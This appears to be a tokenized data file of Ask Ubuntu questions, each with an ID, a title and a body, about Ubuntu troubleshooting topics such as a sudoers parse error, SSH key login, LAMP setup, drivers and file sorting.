x '' } ] ' ; -splitter +json : :xs- > new- > allow_nonref , ' '' test '' ' ; -splitter +json : :xs- > new- > allow_nonref , ' `` 5 '' ' ; +splitter +json : :xs- > new- > canonical , ' [ `` x\\ '' '' , '' \\u1000\\\\n\\nx '' ,1 , { `` \\\\ '' :5 , `` '' : `` x '' } ] ' ; +splitter +json : :xs- > new- > canonical , ' [ `` x\\ '' '' , '' \\u1000\\\\n\\nx '' , 1 , { `` \\\\ `` :5 , `` '' : `` x '' } ] ' ; +splitter +json : :xs- > new- > allow_nonref- > canonical , ' '' test '' ' ; +splitter +json : :xs- > new- > allow_nonref- > canonical , ' `` 5 '' ' ; { my $ text = ' [ 5 ] , { `` '' :1 } , [ 1,2 , 3 ] , { `` 3 '' : null } ' ; yet , since i am new at this , i have no idea of how to use the patch . could you help me to fix the bug ? thanks in advance .
507794	echo to /etc/sudoers causing pasrse error	using fabric if i echo to sudoers file for second time the file got corrupted works fine for first echo . what could be the reason ? first echo : sudo ( 'echo `` django all= ( all : all ) all '' | sudo tee -a /etc/sudoers ' ) second echo : sudo ( 'echo `` celery all ( www-data ) nopasswd : /usr/bin/unoconv '' | sudo tee -a /etc/sudoers ' ) after second echo command and when trying to do sudo i am getting parse error and i am not able to recover the sudoers file again , i have to create a new instance unfortunately : > > > /etc/sudoers : syntax error near line 28 < < < sudo : parse error in /etc/sudoers near line 28 sudo : no valid sudoers sources found , quitting there is no syntax issue as such in second command because if i type it manually using visudo it works fine . and i do n't think that its fabric related issue . fabric is just executing commands on the remote server .
507796	mcrypt php extension required . laravel , xampp error	i 'm having trouble with ubuntu 14.04 , xampp and laravel . i 'm getting mcrypt php extension required . script php artisan clear-compiled handling the post-install-cmd event returned with an error when try to install laravel . i know there are several thread on it and i tried most of them but no luck . please help .
507797	deleting lamp and guest account without affecting default or main root account	i 'm new to adding accounts and i notice that the programs installed in the regular default/main root account are also installed in the newuser ( guest ) account i created with root privileges as well . i would like to install lamp ( which i know how to do ) in the additional root user account and log into it and install lamp but i do n't want lamp to be in the regular main/default root account because of the localhost access . my question is in the default main root account is lamp accessible from here and when the newuser account is no longer needed and you delete it through the regular default/main root account does lamp get entirely uninstall ? or is there a specific way to install lamp so it can stay in the new user account and later delete it . any insight will be greatly appreciated . thank you in advance .
507799	nvidia graphics card switch using nvidia optimus	i 'm having a laptop with nvidia 520mx graphics card with nvidia optimus technology running ubuntu 14.04 . i 've installed nvidia graphics driver version 331.38 and nvidia-prime . what i want to do is to switch the intel graphics card with nvidia . running nvidia x server setting is not showing me any option to switch between two graphics card . below images show which driver i 'm using and what am i missing . why the option to change graphics card is not present in nvidia x server setting in my case ? any help is appreciated .
507802	error installing the noobslab dark theme in ubuntu 14.04	i wan na install the noobslab dark theme in ubuntu 14.04 . i 'm following the steps defined in the site http : //www.noobslab.com/2014/05/delorean-dark-theme-updated-install-in.html but when i try the first step sudo add-apt-repository ppa : noobslab/themes i get the following error can not add ppa : 'ppa : noobslab/themes ' . please check that the ppa name or format is correct . can someone please guide me to install the theme ? i 've been searching for an hour and i do n't get any answer to this error . i 'm behind a proxy and i checked the /etc/apt/apt.conf and it seems to be ok . here it's acquire : :http : :proxy `` http : //192.168.200.17:808/ '' ; acquire : :https : :proxy `` https : //192.168.200.17:808/ '' ; acquire : :ftp : :proxy `` ftp : //192.168.200.17:808/ '' ; acquire : :socks : :proxy `` socks : //192.168.200.17:808/ '' ; i 'm new in linux and i do n't have idea about what can be happening : ( thanks .
507803	plug and play wifi cards for a whole bunch of distros	i need a plug and play wifi card for the following . if you know of a wifi card model that is plug and play compatible with at least a few of these , please list it . debian , ubuntu , linux mint , kali linux , arch , manjaro ,
507805	annotate a book in html format ?	i am using okular for annotating pdf files ( e.g . adding comments , drawing lines , circling text , adding images , ... ) . what applications do you recommend to read and annotate books in html ? for example , this book http : //cvs.sourceforge.net/cvstarballs/cl-cookbook-cvsroot.tar.bz2 , from http : //cl-cookbook.sourceforge.net/ my os is ubuntu 12.04 . thanks .
507810	mounting cifs network shares when logging into user account ?	i have a couple of network shares mounted with cifs in fstab and it works fine when the network is up . however , this is a laptop and often my wi-fi connection is n't up when mounting is triggered by fstab so it fails . is there a way to have the network shares mounted when i log into my user account instead ?
507811	recommendation for a download manager for ubuntu ?	i 've heard about : jdloader , uget , flareget etc . but what are the pros and cons of these softwares ? which one would you suggest to me to be the most reliable and fastest ? thanks jye
507814	strange icon in unity top menu bar after installing kde	after installing kubuntu ( i am using ubuntu 14.04 ) , it seems that a lot of fonts disappeared and a strange icon appeared in the top menu bar in unity . i think it is the keyboard layout icon that has turned into a red circle . what does this mean ? edit : this question : kubuntu-desktop took over everything , illustrate the same problem :
507826	mouse left click failure microsoft wireless mouse 2.0a	i have an intermittent left click failure on this mouse.if i lift the mouse off the pad the function resumes.scrolling and cursor movement is unaffected.os is 14.04.i have seen similar reports for earlier releases but none specific to 14.04 .
507830	how do i retrieve my forgotten passpharase on my ppc server ?	so recently i installed ubuntu server on my power pc mac mini . but , now it takes me through yaboot and asks me to enter my passphrase so it can unlock the disk . i forgot my passphrase . can i install a different flavor of linux or is there a workaround . pressing shift during boot does n't work . please help .
507831	12.04/gnome classic/printer prints 1 job then rubbish	after finally updating to 12.04 with gnome 3.4.2 , i find my printer ( hp laserjet professional p1606dn ) is unable to print more than a single job properly . i must turn the printer off and on to print the next job . if not , it prints reams of rubbish . any suggestions ? i had no problems installing the printer ; it practically installed itself .
507833	how do i switch to unity from xmonad	im a real noob with computers and installed accidentally xmonad , without knowning that it was code-based . how can i switch back to unity ?
507834	how to determine the ips of other components while deploying a charm on nova-compute ?	i am writing a custom charm that is installed on the nova-compute . d uring the installation , i need to configure some os files with the information of os controller , cinder , neutron gateway etc . how do i determine the ips of these components ? are there any hooks available within the charm to do this ? i prefer to write the charm in bash but python is ok too .
507835	xubuntu tile to corners	under the settings - > window manager , i see options to tile to halves of screen , but no options to tile to corners , as has been available in past xubuntu versions . is there a way to re-add this functionality ? edit : this is in xubuntu desktop version 4.10 , ubuntu 14.04
507837	asus f550ln touch pad problem	i recently installed the newest stable release of ubuntu on my asus f550ln and i ca n't get the touch pad to work . well , it works for a single split-second once every 10 seconds circa . i can also use a mouse , but only to move the cursor , i ca n't click at all . i am fairly new to linux and i would like to be able to use ubuntu with my touch pad . i do n't know what more to include here , so sorry if there is some important information i am missing . thanks in advance .
507839	ssh failing to connect	i 'm trying to set up an ssh connection to my ddwrt router . i followed instructions on generating a key pair in the ubuntu documentation ssh/openssh/keys but i 'm not able to connect . the debug output from ssh -vt < my router > is below . i 'd be very grateful to know what the problem might be . ( i have transferred the public key into ddwrt by pasting it in . i can connect using putty from windows and also using the vssh app from my ipod , but now , in trying to get to grips with ubuntu , i 'm hoping to similarly connect . ) martin @ martin-reserved : ~ $ ssh -vt 192.168.1.1 openssh_5.9p1 debian-5ubuntu1.4 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to 192.168.1.1 [ 192.168.1.1 ] port 22. debug1 : connection established . debug1 : identity file /home/martin/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/martin/.ssh/id_rsa-cert type -1 debug1 : identity file /home/martin/.ssh/id_dsa type -1 debug1 : identity file /home/martin/.ssh/id_dsa-cert type -1 debug1 : identity file /home/martin/.ssh/id_ecdsa type -1 debug1 : identity file /home/martin/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version dropbear_0.52 debug1 : no match : dropbear_0.52debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9p1 debian-5ubuntu1.4 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kexdh_init debug1 : expecting ssh2_msg_kexdh_reply debug1 : server host key : rsa 49 : bb : ab:82 : ( blocked out by me ) :46:2f:72 debug1 : host '192.168.1.1 ' is known and matches the rsa host key . debug1 : found key in /home/martin/.ssh/known_hosts:1 debug1 : ssh_rsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received dd-wrt v24-sp2 mini ( c ) 2009 newmedia-net gmbh release : 07/22/09 ( svn revision : 12548 ) debug1 : authentications that can continue : publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/martin/.ssh/id_rsa debug1 : authentications that can continue : publickey debug1 : trying private key : /home/martin/.ssh/id_dsa debug1 : trying private key : /home/martin/.ssh/id_ecdsa debug1 : no more authentication methods to try . permission denied ( publickey ) .
507844	xampp installation on ubuntu 14.04	04 & want to install lampp but do n't know how to install it . can i get some help in installing lampp on my ubuntu .
507845	which kernel version fixes the issue of dell touchpads being recognized as a mouse ?	on ubuntu 14.04 a kernel update seems to fix the problem that the touchpad is just recognized as a mouse . which kernel version fixes this issue ? related thread is here . dell trackpad not recognized in ubuntu 14.04 thanks .
507847	how to configure zend framework 2 with vhost ?	i followed the tutorial of zend framework 2 , but the following error occurs when i try to view the page of the application . i configured vhost like this : < virtualhost *:80 > servername zf2-tutorial.local.br documentroot `` /home/patterson/documentos/scripts/php/zf2-tutorial/public '' setenv application_env `` development '' < directory `` /home/patterson/documentos/scripts/php/zf2-tutorial/public '' > directoryindex index.php allowoverride all order allow , deny allow from all < /directory > < /virtualhost > my /etc/hosts looks like this : 127.0.0.1 localhost 127.0.1.1 ubuntu-note 127.0.0.1 zf2-tutorial.local.br # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters i can not understand what is happening , could someone help me ?
507851	black/blank screen when connecting to freenx server on ubuntu 14.04	i 'm attempting to log into my amazon ec2 instance running ubuntu 14.04 server edition . i 'm running freenx . i installed freenx more-or-less following the instructions in the ubuntu freenx documentation . i modified my /etc/nxserver/node.conf file by setting enable_passdb_authentication= '' 1 '' and adding the line command_start_gnome='gnome-session -- session=ubuntu-2d' which i got from this gist that i randomly found online . i ran the following commands to enable passdb authentication for my primary user ( ubuntu ) sudo nxserver -- adduser ubuntu sudo nxserver -- passwd ubuntu i installed ubuntu desktop apt-get install ubuntu-desktop and a slew of other desktops based on this ask ubuntu post : sudo apt-get install gnome-shell sudo apt-get install xfce4 sudo apt-get install gnome-session-fallback my current problem is that , although the login seems to be working , i 'm getting a black screen in my nx client ; i 've tried both the nomachine and opennx clients on my mac . if i mess with my client configuration , i can access a terminal over nx , but i ca n't start any desktops . when i attempt to start using the default `` gnome '' configuration , i get a black screen . i ca n't figure out how to start any other shell . i 'm most interested in getting some form of gnome working , but i 'll take what i can get . the primary question : why am i getting a black screen when attempting to connect to a gnome shell and what can i do about it ?
507854	i ca n't fix the resolution on virtual box for ubuntu 14.04 the resolution is set to 2560x1965	i need help in solving this problem . i have tried doing that through system settings but to no avail i can not reach the part to change the resolution . is there another way i can set it to another resolution ?
507855	bower install does nothing , not even throw an error	i am on ubuntu 14.04 . i did sudo apt-get install npm . then i did npm install -g bower , which was successful . with which npm , i get /usr/bin/npm/ . with which bower , i get /usr/local/bin/bower . i cloned a github repository which had a bower.json . i try to do bower install in the root but nothing happens . as in , it does n't echo anything , does n't install anything . it simply does ... nothing . i tried bower -- help and nothing comes up . i tried sudo apt-get update and it says npm is up to date . nodejs exists too . whenever i do anything with npm , it simply does nothing . edit : when i do npm -- global ls , bower is listed in the directories what could be the problem here and how can i fix it ?
507864	ubuntu refuses to boot with acpi_backlight=vendor	i bought a dell inspiron 14 5000 series and dual booted windows 8.1 and ubuntu gnome 14.04 . the brightness would not change , so i booted with kernel parameter acpi_backlight=vendor and it worked . i later had to return that specific unit because of a hardware defect for another one . with the second ( current ) unit i installed just regular ubuntu 14.04 . i tried to use the kernel parameter acpi_backlight=vendor with it , but with quiet splash acpi_backlight=vendor all it gave me was a black screen . i booted without quiet splash and it froze at allocating swap space . why is it refusing to boot ? i also tried adding acpi_osi=linux to acpi_backlight=vendor . still would n't boot . acpi_osi=linux on its own does not have any effect .
507865	can i install ubuntu 14.04 on a laptop with builtin camera and mic ?	i bought a laptop with ubuntu 12.10 installed , but i lost the installation cd . now i want to upgrade to ubuntu 14.04 . can i do this without the cd ? my laptop has a microphone and webcam . will these work after an upgrade ?
507867	how to install roboform in firefox	i want to use roboform to remember my passwords but i do n't know how to install roboform in firefox.i have asked some friends , they do n't know , neither . anybody know please tell me.thanks a lot！！
507873	ignore specific programme 's crashes in apport	if you have to use a program that crashes regularly some people tend to uninstall apport ( which you should not ) so how could we exclude a program from apport 's notifications ?
507874	how to fully remove phpmyadmin ?	i have a server with ubuntu server on it ... i install phpmyadmin and screwed up in the installation . i need help uninstalling every single file that came with phpmyadmin . thanks for the answers , your very appreciated .
507875	disable splash screen on ubuntu software center startup	is there a way to disable the splash screen when ubuntu software center starts up ? it takes a long time to load on my laptop . thanks !
507876	ubuntu freezes for 44 seconds every 8 minutes	i am stuck on a problem and am wondering if you have any ideas . i have sites on an ubuntu server in sydney with rackspace . every 8 minutes , without fail , the server hangs for 44 seconds . the interesting thing is that the freezing is related to an ip address . if i am on my computer , the first time i go to a site it will hang for 44 seconds , then start up and work fine for 8 minutes . then it will hang for another 44 seconds . if i am on another computer , with the same ip address , it will hang at the same time . but if someone else is on a different ip address , it will do the same thing , but hang at a different time . so you may be on a site and it will hang and i can refresh a page just fine , and when it hangs for me you may be able to access a site no problem . if i do continuous pinging , it does n't record any spike during a hang . there 's nothing unsual when i do a trace root during a hang . i have checked the number of processes during a hang using pstree and its all fine . there 's no spike in disk usage , memory or cpu . interestingly , when it hangs on my ip address i can still access the server via ftp and upload or download files . i ca n't see any kind of time out / max session setting in the apache2 config file . i 'm all out of ideas . i wonder if anyone has any suggestions as to what i could look at . just for the record , i wrote a wee php script to refresh a page every second and record when it freezes and how long for . here 's the recent log : after 530 seconds - freezed for 43 seconds - 12:43:55 pm after 531 seconds - freezed for 43 seconds - 12:35:05 pm after 493 seconds - freezed for 44 seconds - 12:26:14 pm after 472 seconds - freezed for 44 seconds - 12:18:01 pm after 482 seconds - freezed for 43 seconds - 12:10:09 pm any ideas ? i 'd appreciate any thoughts you have . cheers and thanks , jeff jeff @ firefly.co.nz
507878	ca n't convert flac files to ogg using sound converter	i have one really annoying problem , when i try to convert a flac file to ogg it returns an error message which says that a `` general stream error was found '' in every file . it does create the outpout files but they are empty . have i missed something , is this a bug ? this does not affect other file types , i was able to convert a bunch of mp3 's to ogg without any problem . thanks for your help .
507884	keyboard-shortcut to reset the graphic card driver	i would like to fix the on my lenovo yoga 2 ubuntu 14.04 occasionanal blank screen . since the only workaround is to close the lid and reopen it , i guess the graphic-card gets a hang-up that is gone if the card is turned off and on again . how can i turn off and on the screen like closing and opening the lid does on the commandline ?
507885	changing the direction of persian lines	i 've got a problem with writing persian in ubuntu , the problem is when i try to write mixed persian and english text files in gedit or vim the lines starting with persian characters start from right direction of the screen and it 's hard to follow lines like this . how can i change ubuntu so it just starts lines form left ? [ img ] http : //i62.tinypic.com/2mrad6t.png [ /img ] here is a picture of ms notepad i want them to be aligned like this [ img ] http : //i61.tinypic.com/332w94h.png [ /img ]
507887	installation of lubuntu failed horribly	i had made a copy of lubuntu on my bootable usb stick - went well i had made my computer ( acer aspire one d255e ) boot from the usb- i had checked my device for errors - none found i went t begin the installation- it began as it should - asked if i wanted to merge what i could from the previous os ubuntu 11.04 - it said it would merge what it could otherwise some things may not make it over- fine began the process took me to the installation screen with the bar on the bottom- seemed to get almost the whole way -then said it needed to restart the computer - did so -now it wo n't show a screen - it sounds as if it 's attempting to boot up the power button goes on- ive attempted to start the computer with the stick out and holding down f1 - nothing changes -no screen . help ? ideas ? trouble shooting options ? -thanks
507888	ubuntu support communities for spanish/espanol speakers ?	what are some good ubuntu support communities for spanish/espanol speakers ?
507891	i installed python3 from python.org , and it messed things up . how to i revert to the original python3 on 14.04 ?	i am running ubuntu desktop 14.04 and updated python3 to 3.4.1 from python.org , and it seems that some things are not working correctly , especially 'software update ' . how to i revert completely to the original python3 ? thanks .
507893	how to change the default location of evolution mail folder to another device	i have two hdd . dev/sdb : 74 gb dev/sda : 500 gb the boot loader is in sdb . now the problem is due to heavy emails in evolution , the drive is overloaded and throwing error of low disk space . i have to either shift the evolution mail folder or the boothloader to sda to solve the problem .
507897	no sslvpn directory when starting netextender	i 'm trying to use netextender with ubuntu 12.04 x64 . i 've followed the various tutorials out there for making the symbolic links of libssl and libcrypto to the correct libraries . running the command line version of netextender seems to allow logging in fine but then the following error occurs : pppd : ca n't open options file /etc/ppp/peers/sslvpn : no such file or directory this is not a permissions issue either . whatever `` sslvpn '' is supposed to be simply does not exist . any ideas on how to configure pppd to get that `` sslvpn '' ?
507899	pulseaudio manager gives the error connection failure : connection refused	i 'm using ubuntu 10.04 and recently had to upgrade to pulseaudio due to skype not working with alsa . however it does n't seem to be working . i 've tried the following why am i getting this `` connection to pulseaudio failed '' error ? -- i.e . full uninstall and reinstall i do n't know much about pulseaudio and what it 's supposed to be . so please can somebody help me with the different commands that i can use to debug this further ? finally will an upgrade to a later version of ubuntu solve this issue ? thanks
507900	how can i make my main user an administrator , just like in windows xp ?	how can i make my main user which i log into , an administrator just like in windows xp ?
507901	pidgin on ubuntu 14.04 ( yahoo ) connection problem	i have a problem connecting yahoo using pidgin 2.10.9 . this happened when i upgraded from ubuntu 12.04 to 14.04 . it always displays ( `` unable to connect : connection timed out '' ) . please help me . empathy does not work also . thank you .
507903	i have a question about proprietary drivers for two devices	i 'm asking because i 've looked but i 'm still not sure and i do n't want to chance it . i have two devices that can use proprietary drivers and the last time i used it on one of them it crashed the os and i had to re-install . so , the first device is my msi r9 290 oc gamer edition , can i use the fglrx drivers by selecting it in the software & updates panel instead of using the x.org driver wrapper ( as in is it supported yet ) i have a broadcom wifi module , the last time i enabled this driver it screwed everything up ( this was when i was trying linux mint though , not ubuntu ) will it work as well . it says the driver is 802.11 linux sta wirless driver source from bcmwl-kernal-source in the software & updates panel . the wireless module comes with the mother board , a mini-itx maximus vi impact . i know i can find out myself and i have tried to check but like i said , i do n't want to think i have the answer only to yet again permanently crash the os , so i thought i 'd better ask .
507904	problems with installing with disks	so i have a 64 bit computer so i downloaded the ubuntu 64 bit iso . well i have some 700mb cd-r disk . and i do not have a usb that is available to be used . my question is can i break the iso down to smaller sizes and put it on multiple disks ? and i do hate using lubuntu so can someone please help me ? p.s . where i am right now has no stores nearby so i ca n't go and buy any dvd-r disks .
507906	where or when can i ask ubuntu employees questions related to ubuntu ?	where or when can i ask ubuntu employees questions related to ubuntu ? is there a google hangouts session where they regularly take questions from the community ? is there a schedule for that hypothetical google hangouts session ? are there perhaps any irc channels where i can find them ( to ask only legitimate questions of course , that wo n't waste their time ) ? is there a youtube channel where these hangouts are posted to that i can subscribe to , to see the google hangout sessions ?
507911	update manager not showing 14.04 lts	i am using ubuntu 12.04.5 . whenever i am trying to upgrade to 12.04 lts to 14.04 lts , update manager not showing any upgrade . i think 14.04.1 is already relesed over 10 days . but still why i am not notice update manager not showing lts upgrade ?
507913	lan is not connecting	i am using lan for connection , i entered command sudo pppoeconf and after that i entered sudo pon dsl-provider , but still networking is not getting on
507914	networking not working on encrypted lvm	installed ubuntu 14.04 server with guided full disk encryption lvm and after boot network is not starting . has anybody else faced this issue earlier ? please help
507916	there does n't seem to be a decent guide for stealth could someone either write one or point me to one ?	stealth integrity scanner i 'm very interested in being able to setup an ids and this one seemed like it was really cool and worth while and fairly underrated . i 've not really found much on what a policy file should look like in a basic functional configuration . where a policy file is intended to be located or even if stealth runs its scan on the remote ( target ) or if it copies files to the local machine for scanning locally which to me sounds insane .
507918	unable to shutdown properly on 12.04 before update initramfs	sometime , i encounter problem of inability to shut down properly . but , after i use sudo update-initramfs -u , it can shutdown once . i just curious what was really happen . is sudo update-initramfs -u solve my problem ? ?
507919	installing latest ubuntu on thinkpad ?	i 've decided to install ubuntu on my lenovo thinkpad t430 , and after looking some things up , i found that a version of 12.04 is compatible with it , but my question is , can i install the latest version of ubuntu on the laptop just fine , or would that not work ? it seems to me like there should n't be any problems except maybe that the fingerprint scanner would n't work . i have n't found any newer version of ubuntu that 's actually `` made to work '' with this particular laptop .
507921	moving tabs in chrome is clunky / awkwardly slow	in ubuntu 14.04 lts , fresh install + chrome from google 's page , i 'm having the following issue : when having more than one tab open in chrome 36.0.1985.125 , the animation when moving the tab 's position is really clunky . however , when creating or removing a tab the animation looks fine and responsive , as you should expect . let 's suppose you have tab a and tab b open , tab a to the left , and tab b to the right - you put your pointer above tab a and press the left click . while pressed , you move the pointer to the right , so the tabs switch places with each other . then is when the animation turns slow . is this a known issue ? if so , how can i fix it ? system : processor : amd a6-3420m apu with radeon ( tm ) hd graphics ă 4 memory : 8gb graphics : gallium 0.4 on amd sumo os type : 64-bit chrome : //gpu/ graphics feature status canvas : hardware accelerated flash 3d : hardware accelerated flash stage3d : hardware accelerated flash stage3d baseline profile : hardware accelerated compositing : hardware accelerated and threaded . rasterization : software only . hardware acceleration disabled . video decode : hardware accelerated video encode : hardware accelerated webgl : hardware accelerated
507922	ubuntu 14.04 sound through headphones but not through speaker	i am running dual boot on lenovo yoga 2 pro . i set my default sound card to be the pc-speakers since alsamixer kept randomly changing it to the hdmi after every reboot . there is no sound through the pc-speaker but when i insert a headphone in , there is sound for the headphone . the output devices also only now show headphones . when i unplug , it goes back to speaker but no sound .
507923	sorting files by ascii conventions in ubuntu 14.04	this has been an incredible annoyance for me because it should be so easy to fix ! ! ! i want ascii conventions to be applied when sorting files ( both in the terminal and in nautilus ) because the `` intelligent '' sorting algorithm is anything but in my opinion . there seem to have been fixes for older versions of ubuntu ( c. 2008 ) put out there , where setting `` lc_collate=c '' supposedly fixes the problem ( see here and here for details ) . however this emphatically fails to solve the issue that i am currently having . i am running trusty ( 14.04 ) with the new 3.16 kernel . for example , the ls command currently gives : me 702 - computational fluid dynamics - video lesson 1 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 10 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 11 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 12 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 13 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 14 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 15 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 16 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 17 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 18 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 19 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 2 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 20 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 21 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 22 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 23 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 24 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 25 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 26 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 27 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 28 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 3 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 4 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 5 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 6 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 7 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 8 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 9 ( 360p_h.264-aac ) .mp4 when what i really want is me 702 - computational fluid dynamics - video lesson 1 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 2 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 3 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 4 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 5 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 6 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 7 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 8 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 9 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 10 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 11 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 12 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 13 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 14 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 15 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 16 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 17 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 18 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 19 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 20 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 21 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 22 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 23 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 24 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 25 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 26 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 27 ( 360p_h.264-aac ) .mp4 me 702 - computational fluid dynamics - video lesson 28 ( 360p_h.264-aac ) .mp4 any thoughts on how to get this working ?
507924	booting ubuntu 14.04 from flash drive , pixelated screen	i am booting live booting ubuntu from a usb flash drive . at the setup screen ( this is the first boot ) , the screen is very pixelated rendering the software unusable . i am unable to get past the setup screen because of this . here are some pictures : the third picture has the same overlaid pixelated pattern as the fourth and fifth pictures . i used universal usb installer to put the official ubuntu 14.04 iso onto my flash drive . after selecting the drive in the boot menu , the images tell it all . how would i be able to fix this problem and properly boot ubuntu [ setting this up is very important to my development at this stage ] ? would downgrading to an earlier version have any effect ? also i am a young web developer , new to linux , so an explanation of why this may have happened is encouraged .
507927	any player in ubuntu 14.04 unable to play hd videos	a hd movie of 1.5 gb size unable to play in any player of ubuntu 14.04 . ( players i used to play are smplayer , vlc , dragon ) even though installed ubutnu restricted extras & all player are updated to latest versions . video is in mp4 format with aac audio . when i open that file in any above players it remain only player opened , but no any error message and no partially playing . help me how to play those videos .
507930	what 's the easiest way to install a list of packages with latest version	what 's the easiest way to install a list of packages with latest version ? using apt-cache policy or ubuntu software center , package xxxx only has version 1.1 in pypi ( https : //pypi.python.org/pypi/ ) , the latest version is 1.5 . i do not fancy installing from the download file ( .tar.gz ) . why is n't the latest version reflected in the ubuntu software center ?
507931	ethernet port problem in ubuntu 14.04	i am using windows 7 and ubuntu 14.04 and have an issue with ethernet port . i use internet using lan cable . when i use windows 7 it never disconnects but in case of ubuntu it disconnects for some seconds and connects automatically and internet gets interrupted . please tell how can i get-rid off this problem ?
507933	how to create a debian package using `` equivs-build '' which can be `` upgraded '' if already installed ?	i have created a .deb package using equivs-build command and providing necessary control , preinst , postinst , etc . i noticed that version can also be mentioned in control file . now i want to create a .deb package with updated source code and i want to enable user to upgrade the package if it is already installed ( and is of previous version , of course ) , as i wo n't be changing conf related files , etc . one way i can think of is to write a script which will first check for installed version , and will take actions accordingly ( i.e . if installed , just update the source-code , database-migrations , etc . and if not , install the package using dpkg -i < package-name > ) . i was wondering if there was a way to achieve using dpkg only ( something like dpkg upgrade < package-name > ) which will handle installation or up-gradation as required .
507934	ubuntu 12.10 on asus eee pc 1015 px	i have installed ubuntu 12.10 on my asus eee pc 1015 px . i m unable to update using the software updater . it shows : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_quantal-updates_main_i18n_translation-en e : the package lists or status file could not be parsed or opened can you suggest which version of ubuntu will work better on asus eee pc 1015 px netbook ?
